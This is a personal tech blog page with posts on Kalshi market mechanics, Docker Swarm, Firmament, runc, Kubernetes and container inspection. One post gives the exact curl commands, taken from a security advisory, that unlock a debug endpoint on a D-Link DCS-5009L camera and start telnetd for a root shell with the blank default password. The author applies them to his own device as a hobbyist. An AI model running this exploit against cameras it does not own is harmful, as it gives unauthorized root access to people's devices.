Kalshi Market Mechanics

Recently I’ve been studying the prediction market Kalshi. Kalshi is a CFTC approved market for binary event contracts. This post is about how the internal mechanics of Kalshi markets work. This understanding is valuable for writing trading bots that access Kalshi using its REST API, or for prediction market enthusiasts who want to peak under the hood.

Event Contracts

What is an event contract? Let’s look at an example. The MOON-25 contract lets you bet on whether NASA will land a manned mission on the moon by 2025. Like in a futures market, you can open a position on either side of the contract: Yes or No. For instance, if you open a Yes position, you’re buying a contract that will pay out $1 if NASA does land on the moon by 2025, and $0 if they do not.

The Kalshi Web UI

The Kalshi website offers a rich UI that presents each Kalshi market as a typical two-sided market with a standard bids-and-asks order books for both the Yes and No contracts on the event. If you think NASA will land on the moon, you buy Yes at the current best ask price in the order book for Yes. As I’ll show in a moment, that’s not how Kalshi markets work internally. However, it’s a good simplification for people who are used to stock, crypto and other double-sided markets.

Kalshi Markets Under the Hood

This article is about how Kalshi markets work under the hood. You’ll want to understand this to write trading bots that use Kalshi’s API. (You can experiment with my own trading bot toolkit at github.com/fsctl/go-kalshi).

Read the rest of this entry »

Leave a Comment

EthCC Paris 2019 Talk

Leave a Comment

libp2p: latest project for 2018-2019

My current work focuses on enabling Internet decentralization through the open source project libp2p, along with the fine folks at Protocol Labs. Here are a couple of recent presentations I gave on libp2p.

At Protocol Labs’ Lab Day event in SF:

At the Web3 Summit in Berlin:

Leave a Comment

DockerCon 2016 Keynote

Andrea and I presented Docker 1.12 orchestration on stage at DockerCon this year — in front of 4,000 people! I don’t even think I’ve ever met 4,000 people. It was awesome!

Comments (5)

Getting a root telnet prompt on D-Link DCS-5009L IP Camera

My dad thoughtfully sent me a DCS-5009L nanny cam to play around with yesterday. Naturally, the first thing I wanted to do was get to a root shell on the device. I quickly came across this security advisory from Tao Sauvage at IOActive. Thanks, Tao!

tl;dr plug in the camera, figure out its IP and start telnetd like this:

$ curl --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000' -X POST http://admin@[CAMERA_IP]/setDebugLevel
$ curl --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test' -X POST http://admin@[CAMERA_IP]/setSystemCommand
$ telnet [CAMERA_IP]
Trying 10.0.1.173...
Connected to 10.0.1.173.
Escape character is '^]'.

(none) login: admin
Password: [leave blank]


BusyBox v1.12.1 (2014-09-03 17:28:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# 

Default username is admin with password empty.

Per Tao’s security advisor: in the first curl, 1180250000 is a magic constant that puts the device in a debugging mode where the /setSystemCommand HTTP endpoint is available. In the second curl, we use this endpoint to run telnetd.

Leave a Comment

Docker Swarm 1.0 with Multi-host Networking: Manual Setup

Jeff Nickoloff had a great Medium post recently about how to set up a Swarm 1.0 cluster using the multi-host networking features added in Docker 1.9. He uses Docker Machine’s built-in Swarm support to create a demonstration cluster in just a few minutes.

In this post, I’ll show how to recreate the same cluster manually — that is, without docker-machine provisioning. This is for advanced users who want to understand what Machine is doing under the hood.

First, let’s take a look at the layout of the cluster Jeff created in his post. There are four machines:

Swarm cluster topology

Topology of our Swarm cluster.

To approximate the provisioning that Machine is doing under the hood, we’ll use this Vagrantfile to provision four Ubuntu boxes:

Name   IP   Description
kv2   192.168.33.10   Consul (for both cluster discovery and networking)
c0-master   192.168.33.11   Swarm master
c0-n1   192.168.33.12   Swarm node 1
c0-n2   192.168.33.13   Swarm node 2

In the directory where you saved the Vagrantfile, run vagrant up. This will take 5-10 minutes, but at the end of the process you should have four running VMs with Docker 1.9 or higher running. Note how our Vagrant file starts each instance of Docker Engine (the docker daemon) with --cluster-store=consul://192.168.33.10:8500 and --cluster-advertise=eth1:2375. Those flags are the same ones Jeff passes to docker-machine using --engine-opt.

Because Docker networking requires a >= 3.16 kernel, we need to do one manual step on each machine to upgrade its kernel. Run these commands from your host shell prompt:

$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" kv2
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-master
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n1
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n2

(Jeff doesn’t have to do this in his tutorial because Machine provisions using an iso that contains a recent kernel.)

We’re now ready to set up a Consul key/value store just as Jeff did:

$ docker -H=tcp://192.168.33.10:2375 run -d -p 8500:8500 -h consul progrium/consul -server -bootstrap

Here’s how you manually start the swarm manager on the c0-master machine:

$ docker -H=tcp://192.168.33.11:2375 run -d -p 3375:2375 swarm manage consul://192.168.33.10:8500/

Next we start two swarm agent containers on nodes c0-n1 and c0-n2:

$ docker -H=tcp://192.168.33.12:2375 run -d swarm join --advertise=192.168.33.12:2375 consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.13:2375 run -d swarm join --advertise=192.168.33.13:2375 consul://192.168.33.10:8500/

Let’s test the cluster:

$ docker -H=tcp://192.168.33.11:3375 info
$ docker -H=tcp://192.168.33.11:3375 run swarm list consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.11:3375 run hello-world

Create the overlay network just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 network create -d overlay myStack1
$ docker -H=tcp://192.168.33.11:3375 network ls

Create the same two (nginx and alpine) containers that Jeff did:

$ docker -H=tcp://192.168.33.11:3375 run -d --name web --net myStack1 nginx
$ docker -H=tcp://192.168.33.11:3375 run -itd --name shell1 --net myStack1 alpine /bin/sh

And verify they can talk to each other just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 attach shell1
$ ping web
$ apk update && apk add curl
$ curl http://web/

You should find that shell1 is able to ping the nginx container, and vice-versa, just as was the case in Jeff’s tutorial.

Comments (16)

What is the Firmament scheduler?

Some in the Kubernetes community are considering adopting a new scheduler based on Malte Schwarzkopf’s Firmament cluster scheduler. I just finished reading Ch. 5 of Malte’s thesis. Here’s a high level summary of what Firmament is about.

Today’s container orchestration systems like Kubernetes, Mesos, Diego and Docker Swarm rely heavily on straightforward heuristics for scheduling. This works well if you want to optimize along a single dimension, like efficient bin packing of workloads to servers. But these heuristics are not designed to simultaneously handle complex tradeoffs between competing priorities like data locality, scheduling delay, soft and hard affinity constraints, inter-task dependency constraints, etc. Taking so many factors into account at once is difficult.

The Firmament scheduler tries to optimize across many tradeoffs, while still making fast scheduling decisions. How? Like Microsoft’s Quincy scheduler, it considers things from a new angle: cost. Suppose we assign a cost to every scheduling tradeoff. The problem of efficient scheduling then becomes a global cost minimization problem, which is much more tractable than trying to design a heuristic that balances many different factors.

Firmament’s technical implementation is to model the scheduling problem as a flow graph. Workloads are the flow sources, and they flow into the cluster, whose topology of machines and availability zones is modeled by vertices in the graph. Ultimately, all workloads arrive at a global sink, having either flowed through a machine on which they were scheduled or having remained unscheduled. Which path is decided by cost.

Here’s a simplified diagram I created (based on Firmament’s diagram (which is a simpler version of Quincy’s Fig. 4)):

Simplified example of Firmament's flow graph structure.

Simplified example of Firmament’s flow graph structure. By assigning costs to each edge, global cost minimization can be performed. For example, each of the three workloads may be scheduled on the cluster or remain unscheduled, depending on the relative costs of their immediate execution vs. delay.

But how are these costs determined? That’s the coolest part of Firmament: it supports pluggable cost models through a cost model API. Firmament provides several performance-based cost models as well as an interesting one that seeks to minimize data center electricity consumption. Of course, users can supply their own cost models through the API.

For more information on Firmament, here are some resources:

Comments (1)

Docker runc

I had some time recently to start playing around with Docker’s new runc / OpenContainers work.  This is basically the old libcontainer, but now it’s an industry consortium governed by the Linux Foundation.  So, Docker and CoreOS are now friends, or at least frenemies, which is very exciting.

The README over on runc doesn’t fully explain how to get runc to work, i.e., to run a simple example container.  They provide a nice example container.json file, but it comes with without a rootfs, which is confusing if you’re just getting started.  I posted a github issue comment about how to make their container.json work.

Here are the full steps to get the runc sample working:

1.  Build the runc binary if you haven’t already:

cd $GOPATH/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
make

2.  Grab their container.json from this section of the runc readme:  opencontainers/runc#ocf-container-json-format

3.  Build a rootfs. The easiest way to do this is to docker export the filesystem of an existing container:


docker run -it ubuntu bash

Now exit immediately (Ctrl+D).


docker ps -a # to find the container ID of the ubuntu container you just exited
docker export [container ID] > docker-ubuntu.tar

Then untar docker-ubuntu.tar into a directory called rootfs, which should be in the same parent directory as your container.json. You now have a rootfs that will work with the container.json linked above. Type sudo runc and you’ll be at an sh prompt, inside your container.

Leave a Comment

Kubernetes Concepts

Once you have a Kubernetes cluster up and running, there are three key abstractions to understand: pods, services and replication controllers.

Pods. Pods — as in a pod of whales (whale metaphors are very popular in this space) — is a group of containers scheduled on the same host. They are tightly coupled because they are all part of the same application and would have run on the same host in the old days. Each container in a pod shares the same network, IPC and PID namespaces. Of course, since Docker doesn’t support shared PID namespaces (every Docker process is PID 1 of its own hierarchy and there’s no way to merge two running containers), a pod right now is really just a group of Docker containers running on the same host with shared Kubernetes volumes (as distinct from Docker volumes).

Pods are a low level primitive. Users do not normally create them directly; instead, replication controller are responsible for creating pods (see below).

You can view pods like this:

kubectl.sh get pods

Read more about pods in the Kubernetes documentation: Kubernetes Pods

Replication Controllers. Pods, like the containers within them, are ephemeral. They do not survive node failure or reboots. Instead, replication controllers are used to keep a certain number of pod replicas running at all times, taking care to start new pod replicas when more or needed. Thus, replication controllers are longer lived than pods and can be thought of like a manager abstraction sitting atop of the pod concept.

You can view replication controllers like this:

kubectl.sh get replicationControllers

Read more about replication controllers in the Kubernetes documentation: Replication Controllers in Kubernetes.

Services. Services are an abstraction that groups together multiple pods to provide a service. (The term “service” here is used in the microservices architecture sense.) The example in the Kubernetes documentation is that of an image-processing backend, which may consist of several pod replicas. These replicas, grouped together, represent the image processing microservice within your larger application.

A service is longer lived than a replication controller, and a service may create or destroy many replication controllers during its life. Just as replication controllers are a management abstraction sitting atop the pods abstraction, services can be thought of as a control abstraction that sits atop multiple replication controllers.

You can view services like this:

kubectl.sh get services

Read more about services in the Kubernetes documentation: Kubernetes Services.

Source / Further Reading: Design of Kubernetes

Leave a Comment

Techniques for Exploring Docker Containers

The preferred method of poking around inside a running Docker container is nsenter. Docker has a nice tutorial.

But what if your container doesn’t have any executable shell like /bin/sh? You can’t enter it with nsenter or docker exec. But here are a few tricks you can use to learn about it.

docker inspect -f {{.Config.Env}} – will show you the environment variables in the container

docker export | tar -tvf - – to list the filesystem inside the container (thanks to cnf on #docker-dev for teaching me this one)

docker export | tar -xvf - . – can do this from a temp directory to extract the entire container filesystem and examine it in more detail

I’ll add more tricks here in the future.

Leave a Comment

Older Posts »